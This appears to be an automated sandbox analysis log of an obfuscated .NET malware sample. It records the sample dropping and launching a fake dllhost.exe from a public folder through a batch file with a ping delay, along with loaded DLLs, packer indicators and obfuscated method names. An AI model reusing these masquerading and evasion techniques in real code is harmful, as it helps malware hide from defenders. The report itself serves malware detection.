Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\dllhost.exe "C:\Users\Public\Libraries\dllhost.exe"
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\dllhost.exe "C:\Users\Public\Libraries\dllhost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Directory created: C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe			Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Directory created: C:\Program Files\7-Zip\Lang\74cb7468389f91			Jump to behavior

Source: eu6OEBpBCI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: eu6OEBpBCI.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: eu6OEBpBCI.exe

Static file information: File size 3682816 > 1048576

Source: eu6OEBpBCI.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x382a00

Source: eu6OEBpBCI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs

.Net Code: Type.GetTypeFromHandle(p0pvTxtcPv1YtMEtrTP.TfVEytSM6p9(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(p0pvTxtcPv1YtMEtrTP.TfVEytSM6p9(16777246)),Type.GetTypeFromHandle(p0pvTxtcPv1YtMEtrTP.TfVEytSM6p9(16777260))})

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B927141 push edi; retf	0_2_00007FFD9B927136
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B931E0E push ds; retf	0_2_00007FFD9B931E0F
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9C75B4 push es; retf	0_2_00007FFD9B9C75B7
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9C68B4 push ebx; ret	0_2_00007FFD9B9C68BA
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9BE773FA push eax; iretd	0_2_00007FFD9BE77469
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9BE72D70 push FFFFFFE8h; retf	0_2_00007FFD9BE72DF1
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9BE72D6C push FFFFFFE8h; retf	0_2_00007FFD9BE72DF1
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB27141 push edi; retf	5_2_00007FFD9BB27136
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB31E0E push ds; retf	5_2_00007FFD9BB31E0F
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BBC75B4 push es; retf	5_2_00007FFD9BBC75B7
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BBC68B4 push ebx; ret	5_2_00007FFD9BBC68BA
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9C0718B8 push FFFFFFE8h; retf	5_2_00007FFD9C072DF1
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9C0773FA push eax; iretd	5_2_00007FFD9C077469
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9C296C90 pushfd ; iretd	5_2_00007FFD9C296C91

Source: eu6OEBpBCI.exe, lvhPbaUiyBeOiuQxKvG.cs	High entropy of concatenated method names: 'rdFUjA0pnL', 'nkmUsS2gqe', 'sR6UMZfImZ', 'EDcU2qZlfC', 'PoVUObAj7B', 'BchMesPoEvtlP31hREti', 'J6jc7RPoWv9YTtfmigY3', 'coNo0hPoPk9YFWa2N24k', 'qw1sYMPobDPQ6RA8anwX', 'DhPM0tPo5YMbFbygPygA'
Source: eu6OEBpBCI.exe, kbmOKIV9BejXyToIdtW.cs	High entropy of concatenated method names: 'knhVsRgYXB', 'tjOVMZ3iD3', 'RpsV2wqphM', 'sgNHa0PJ9Xd4uagfxAlO', 'PWrXZhPJJQ9T7exVgDlE', 'CkRiygPJLtQXmrZmVXRB', 'Ewclo5PJkQM5cK0rCH6h', 'fIlVmMolTA', 'FIlVhqkeas', 'HpqV7Ncm90'
Source: eu6OEBpBCI.exe, faVm4IVnubYPKksJAIr.cs	High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'bNt9GtPJRvpHZdRPnGxu', 'EAsQCxPJifg1CLWfImrM', 'Ks9DsfPJ6x4blEqZChdo', 'avD47CPJj6s4dctFO8EB'
Source: eu6OEBpBCI.exe, TsuaPF5u8I46JH9YJqG.cs	High entropy of concatenated method names: 'jtG5qnmlem', 'KfV5XYmQJ2', 'qYk53HsE5Z', 'qV9589GC4S', 's6tlWBPLdrRfav6Q5Ox0', 'BwON0MPLNqruPNo0vXSZ', 'zM667GPLGnjYJH4N5iY4', 'gqaDD9PLSkd4Pte5cv2k', 'BSCy8FPLBFy9a0arOTgh', 'rAYrMqPLF3qy0ZqEWZS0'
Source: eu6OEBpBCI.exe, Oppx4x4Mv4eRFwcDILX.cs	High entropy of concatenated method names: 't0v4n6NVra', 'JPP4IjF3sZ', 'GGB4YiV9cI', 'fWS40cgF1l', 'VZU4tKEtwc', 'itu4xl7ATl', 'Oqi4zgOmHe', 'vJeNNSPmLHLG8D5CvPYv', 'PIWXVnPmkJU35HpaQFqu', 'qyKA2nPm3aIuZJbfYdqI'
Source: eu6OEBpBCI.exe, PseYhcD6GEe19qAD3jX.cs	High entropy of concatenated method names: 'IM3VWOvEiC', 'm3jVPca0kk', 'TdbVEjE2rZ', 'cRDVR9P9YaZiAhKfoVdm', 'HTYddyP90h7WRMUxBlCu', 'lAqW84P9nDs3dNc3vAIH', 'zStfHGP9Ioa1DUpTD4Cl', 'HKZDsMTCFx', 'p6BDMd1shd', 'JcnD2Hroy0'
Source: eu6OEBpBCI.exe, stZUPfgZh1YwqJVIbQG.cs	High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'T6EgG72Oru', '_947', 'AOYgd8B41C', 'AucgSDERkE', '_1f8', '_71D'
Source: eu6OEBpBCI.exe, F1TU4KCuCJYku7k3XkN.cs	High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'ExtCqCqqVD', 'Vvg6aIPITQNVIabSikVq', 'wwauN2PIrYljZRX7exeY', 'kxVBedPIR6S4ORZ0XNAZ', 'snuf66PIinwoPSacI0S9', 'Y1jTSuPI6ToG2SL2VSNK', 'fHtZ2yPIjtxFq5oixpfs'
Source: eu6OEBpBCI.exe, olbiN4PKDsWULbkrgdb.cs	High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'CPLP4ab5ObJ', 'UtKPbOSQlN3', 'N5owjaPqwHlfArnIskuX', 'tt1kNkPqnPm2BZCemARj', 'VTcgAgPqIXNsdxRdvPxI'
Source: eu6OEBpBCI.exe, G01pPeE8ApODstV6ggu.cs	High entropy of concatenated method names: 'xkxETYU26H', 'VOoIkjP3NYJt6sypDbdM', 'gU8CEeP31vIY3uTtBWA4', 'UwavhnP3ZH4cb67EhnCp', 'pwCsTSP3GmpGu1UNNKT3', 'RnvEkHTMKh', 'Le8E9Nr6NV', 'BuGEJCOF47', 'WNMEmWZNZI', 'Xaw57jP3l3wRLuYrsfYe'
Source: eu6OEBpBCI.exe, F0yvdWbH2yg7jsI6JaB.cs	High entropy of concatenated method names: 'eBCbl23ZxY', 'lo4bUbyk5V', 'nTNbAcv6HY', 'vwbuXtP3nM9HwpNvSrGw', 'HeGCTAP3ItSr7uPqObJw', 'UuZqanP3QrAxOSdINnir', 'iIv4DUP3whjj8yeCC5V9', 'grvN2PP3YF47YLkxgFAJ', 'YCFEthP308m2dewIVqrJ', 'I4xGxyP3tVF1Xt9mWqLZ'
Source: eu6OEBpBCI.exe, eeAs1pciF4fVdqA9m4.cs	High entropy of concatenated method names: 'H92J9iop5', 'IwncZSPKYWZ6nloRf2hL', 'W4iMUgPKn2UWsdT8otsk', 'oT5Hi8PKIS4f4MwTPZ5S', 'h42ZZdfT7', 'BOWN1mbII', 'xxlGTqpuN', 'f7SdeR4k9', 'J5LScIYy9', 'D8IBao0Jt'
Source: eu6OEBpBCI.exe, vMFJ3PXNPfSnMNlGZAc.cs	High entropy of concatenated method names: 'L7yXddZmmF', 'ykAXSpcg7g', 'pnwXB2YfJT', 'GMRXFrp099', 'oiiXuWEgZw', 'VJlXKRRpPN', 'fxPUAgPsKHyDFHhG7vBr', 'QITkjmPsFAp9ZPGeIaeu', 'Ia0wjbPsuWv2Bvs8jAcD', 'J7SqMKPsqvdfhOS1ZnTN'
Source: eu6OEBpBCI.exe, RSR7qhOYRi8Lm0IRBWS.cs	High entropy of concatenated method names: 'u7YClGGGNf', 'wjQtQTPIul6wkZoe6J18', 'IgR9WsPIBcLx6GmE6Ubh', 'fnnu1mPIFVEioag48GZH', 'AEK16OPIK3KP1QRNJR15', 'CPX', 'h7V', 'G6s', '_2r8', 'FGePDJHhgEj'
Source: eu6OEBpBCI.exe, AiBEXhOCUGTCsWhJtu7.cs	High entropy of concatenated method names: 'b8XP4j8VQ0M', 'ulDOwq8t4s', 'MChOntWHD5', 'gSBOI9Fu2R', 'LO3BAqPnjXgvTol8uWMe', 'R4pqXwPns0aMUGyy2sZe', 'rtodABPnM73quFOEsftq', 'oiAkJPPn2sOxLWCHEDDc', 'njrbHTPnOAjkpZFEwf76', 'vNMDlKPnC20i84NWCveU'
Source: eu6OEBpBCI.exe, kPR3y27rHAWPLBjdl1r.cs	High entropy of concatenated method names: 'kxV7i0DwXK', 'KB276K9FPr', 'SV87jhJCio', 'HJx7snbqYf', 'j567Mdndi1', 'TQ972V9S4A', 'fq57ObfBTf', 'PCg7C2uTMN', 'yYk7QaP0Mf', 'lIu7w8b1nL'
Source: eu6OEBpBCI.exe, WxXDO3XQLCrqUbxJG2s.cs	High entropy of concatenated method names: 'pEEXnanYuX', 'A1bXIUeIQd', 'o75XYWwFNd', 'qpBX0a2k3q', 'JbjXtMAhkL', 'gwqXxhNVLd', 'VsUXzXGXQ4', 'G7H3W1vS69', 'ujR3PbQTic', 'E4i3E2bxsK'
Source: eu6OEBpBCI.exe, uSRj1oHYWWCnMpFABwD.cs	High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'pNLHt0u18Z', 'ml2P4rn98aE', 'FXUHxCBSPj', 'enrP4RMPlx1', 'q6ZR9VP7RYEchyRqcWSp', 'p3KSo5P7TrMKSDA9vFB8', 'UcnyQZP7rqgFOqVJfawS'
Source: eu6OEBpBCI.exe, emVEkDm4ISniPiXXAtm.cs	High entropy of concatenated method names: 'HewmH0yyM4', '_64r', '_69F', '_478', 'Dxxmfab1vP', '_4D8', 'FFJmlLafmJ', 'RnAmUvtT2I', '_4qr', 'zQemApijxK'
Source: eu6OEBpBCI.exe, TrF0DO8754Wh29dC3dp.cs	High entropy of concatenated method names: 'OQU8oOdxEV', 'kjd8T6wq30', 'MeG8rYcCkJ', 'xIi8R18rSB', 'cxH8i1mSHU', 'DfCuI8P29V7V4AcQQCDR', 'qNJcBeP2JI8RVjFucyMt', 'QBrUyhP2m2VBtnMptes6', 'gEOeVrP2L7MO0DldhkuC', 'WpS8ZVP2kOlbHGeYEpaD'
Source: eu6OEBpBCI.exe, UEc48jAkyAbw0KOym9G.cs	High entropy of concatenated method names: 'j9l', 'zFCAJv3bUR', 'DDIAmJbRbX', 'PXYAhw7ARP', 'S9MA78ymv7', 'IJUAp08g6g', 'P3ZAoyxyBL', 'zBu7jTPoK4jdLcwevhyO', 'uKS52EPoFwVeBL8O6Key', 'GfcEdQPourTcUrwQr5Ia'
Source: eu6OEBpBCI.exe, BMHc7CHpppAwh4sKsjE.cs	High entropy of concatenated method names: '_2SY', 'cipP4hDWgW7', 'w1bHThtIsw', 'fCMP477e1uO', 'rpjivSP7NjUCxhkjWb1S', 'fV5AdtP7G3BqCeUgm4cD', 'NaAsmNP71i4Sw19rxfet', 'g4eqegP7ZBOKtYdHTZjR', 'cevTReP7dyyNWUv7MLZ9', 'hA5mddP7S8mdQRJGsT3i'
Source: eu6OEBpBCI.exe, HhH2sxbtni3HS0AL35E.cs	High entropy of concatenated method names: 'Wt95gpA0EO', 'hqiRHrPLDVVPxdqc2MWo', 'fhNpQgPL5JIopkPQ56Or', 'bXaJXOPLycFuFUdqNxq7', 'GReWwHPLVEb6bWkGQqZN', 'iDWFnkPLfF5Zsmq8IC9X', 'NHoSq2PLviEl6FDNlLmj', 'FYoZ5vPLHNpc2xoje0v8', 'tFLTgmPLlwtXB5ssLbcT', 'SnD5S0Qbqk'
Source: eu6OEBpBCI.exe, AaPQ0wAQbkv3tbZWqVd.cs	High entropy of concatenated method names: 'Ue0AnAq3RN', 'kKWAIM1Fhy', 'wlDAYvuHFJ', 'DSCA05UYDg', 'pAgAtuTqeL', 'oGJWMXPoTJitf98x33xT', 'YlMqLoPopcIb0vM68bOy', 'Set0hYPooWsEpWSlvk91', 'O1aycJPort4ybc33OFHy', 'DQe5irPoRpbIxvoU9MMS'
Source: eu6OEBpBCI.exe, JWsrR9Xb5CUQsEHW9Yx.cs	High entropy of concatenated method names: 'KrYXypMYyq', 'mJ4XDeTFqJ', 'OxoXVqGUfL', 'ut4X4jCinm', 'PddXv0AbUq', 'KLAlpmPsyKR3nCGFeWj3', 'wcuGkZPsbAjLNOPUVXOZ', 'cK4UbHPs56JQTW75Wauj', 'EB2MfFPsDYCyQZZ0agX1', 'AglikRPsVIp1iy08GOMS'
Source: eu6OEBpBCI.exe, GBugGODVDHBkC4L6uMM.cs	High entropy of concatenated method names: 'hUaDN2oQ4Y', 'WvYDGDdjmX', 'ykquCOP9vhaVAIr3Xg4b', 'SrD4NqP9Hd5IEU0bI6TN', 'mem26rP9VLB3YbvQq7hM', 'sOLiKNP94fFFCxidMMfC', 'tWdDcevQgR', 'vHaD1EN1Ge', 'OvfxUVP9yI77Pg7tgfq3', 'O2wpptP9bB9S0HrJlg3Y'
Source: eu6OEBpBCI.exe, lOSccI5CMYuPvFJjBv0.cs	High entropy of concatenated method names: 'ijq5t91BVs', 'Tdf5xuwrMJ', 'rer5zvwyGc', 'C4R1EcPLn2NFSHsCoPrl', 'qEyO8BPLIBwQ1RWSDLFl', 'f9gqUPPLQ5SW4oScDduH', 'NmkCBSPLw7TSrJJel1LE', 'xjM5w5RYq1', 'XEA5nbE4kb', 'dlo5IeOygp'
Source: eu6OEBpBCI.exe, hFNLGHPAAsbPuHV8Bmx.cs	High entropy of concatenated method names: 'lErPaIHgUx', 'BsTPegCBcW', 'gtvPcIN6Mp', 'A3SOPEPqmImJT9Z3O7BS', 'Da7GM4Pqh9RyhieP6TD9', 'RUWQoePq7CQ4pXB60ln2', 'q2VA1hPqpsqWCqTE9VDw', 'rVSd0YPqo7qGOY5BHoxB', 'qmplcZPqTKhieuaLg7b0'
Source: eu6OEBpBCI.exe, UVa5ViQUZ8bOQit4B55.cs	High entropy of concatenated method names: 'TdrPD7m762w', 'vnlPDpXn4eT', 'y14PDoIHaYU', 'QPeQYaPYjFF9r5knvVnH', 'B6kh6VPYiJvB9dYhyG6o', 'sWV1ooPY61rP0UmyR80M', 'Y4a5M9PYsb9IbiQl4dly', 'uC4P4s1ibyA', 'vnlPDpXn4eT', 'RUqiemPYCxaTWDCCxoNy'
Source: eu6OEBpBCI.exe, cklTxgySwbsT2f9CxdI.cs	High entropy of concatenated method names: 'EHiymxvjCB', 'omKyhfaJHH', 'PR61ZEPkL1brLyxvwlGs', 'pOdtClPk3gxuoIMS7wjn', 'XeN9x2Pk8hF0XKG5HOt2', 'HnbyFeG2Gi', 'SdDyu3TLor', 'uaXyKMlL2A', 'D9cyqwYVfg', 'FstyX2pFLX'
Source: eu6OEBpBCI.exe, IaEsEkPI5m12N6QZQQA.cs	High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'qdlP4Z6pIx0', 'UtKPbOSQlN3', 'NlSNl4PXK7FSJG4TVH6x', 'LLIVOePXqOpOrGC9ZjrX', 'rhQqfPPXXFhLKXM7SGeh'
Source: eu6OEBpBCI.exe, jMj06eQ5S9GK9C9xRr4.cs	High entropy of concatenated method names: 'vQ9QDeIyfF', 'KntQVmcEkE', 'wGcQ4qST2v', 'ynVQvSffEV', '_0023Nn', 'Dispose', 'vNA9WgPYD3BK67tjpClF', 'fpwPRZPYV3S7Lg3p8Vnk', 'EpIWs2PY49Cpt4u8eAAW', 'zQX5x3PYvU0SqdKD7Wkh'
Source: eu6OEBpBCI.exe, micKxvcE9iWXap0su0i.cs	High entropy of concatenated method names: 'KoUccW6h8A', 'AKJcZlScnv', 'IGOc5JhV6c', 'SKDcyk0akD', 'I1lcDcmcGg', 'y0pcVNf7ut', 'MQWc4CqVB0', 'xPZcvUMIPx', 'L3WcH4euob', 'VHLcf1J04T'
Source: eu6OEBpBCI.exe, DD0mTbvz6kIaFAAOQ8u.cs	High entropy of concatenated method names: 'NeFHDNWYhY', 'ldSmLePhobvxoKxVNBBY', 'wj4PBDPh7FwH6VD61Drv', 'hXV7qWPhp3Pn8YHp8l6i', 'blC1kdPhTdUKTXmjD0Ox', 's7EmsAPhrhblUnOQayib', 'eq7', 'd65', 'R5hP5GKJiVb', 'nOSP5dvaxMn'
Source: eu6OEBpBCI.exe, H0qwsmzphmY8OVCkIx.cs	High entropy of concatenated method names: 'sT8PPUykGI', 'zvKPbCwwl0', 'pUMP5ARPuT', 'x9GPySVHKh', 'jg6PDBkCqQ', 'G85PVffPju', 'xHSPveJ63S', 't1lrP6PqqKcNTt9GpXsJ', 'OGZ7BiPqXk3oPbU77EmO', 'RKbLONPq3cIDE3HhXN9d'
Source: eu6OEBpBCI.exe, qyX1sLE43pbreiBtAcL.cs	High entropy of concatenated method names: 'fIPEHe2h9m', 'WklEfiwsDv', 'MEBEldgvU4', 'nKqhYoPXjJf3PjF4KEmc', 'bs7Bf1PXidCmp7tR4cOM', 'JUKiyWPX6NLk7qBC1bSS', 'yHcY80PXsyRgUMDc7IKT', 'C2bGTvPXMEhcprl6Hm82', 'eUme4MPX2PZeadmQHJf5', 'q5LQ4ZPXOUMhmpFmfu7g'
Source: eu6OEBpBCI.exe, PH9KZiwiAx8da5mxNZo.cs	High entropy of concatenated method names: 'r6DwjP87ED', 'XJiwsenAfd', 'uerwMqBlGG', 'Lfow2rHYu1', 'mRywOIUoO9', 'qBYwClOYWL', 'An9wQ43jPd', 'UH4wwAhDmG', 'UuFUGGP0k2rtQe5vkNGJ', 'V23U4UP09dHtkOVfBoA9'
Source: eu6OEBpBCI.exe, Smx8Adfd8LaIJ0eabv2.cs	High entropy of concatenated method names: 'BvGfB7dgrI', 'IqVfFqKQU0', 'G7XfuOnSCl', 'l2CyvbPpcU939qpg2f38', 'QFSU80PpautuEJBeO064', 'AYZUXgPpeJanl6jUdWb5', 'KQpDn7Pp1SsvaYgNHxYl', 'gRJ01CPpZp2tZcDb0CLy', 'p3Wf39PpNJH8QXC0Gk9K'
Source: eu6OEBpBCI.exe, cdpJcc71vcM9hhqJ4wG.cs	High entropy of concatenated method names: 'Tnc7N3I9n1', 'FuB7GCF5t0', 'Irn7dPYIAd', 'dGJ7SvP6M7', 'hj67BY2RUI', 'HKm7FOP9lx', 'pRt7upepgR', 'UDT7KIB1XI', 'hf47q903qa', 'CYr7XiDU2H'
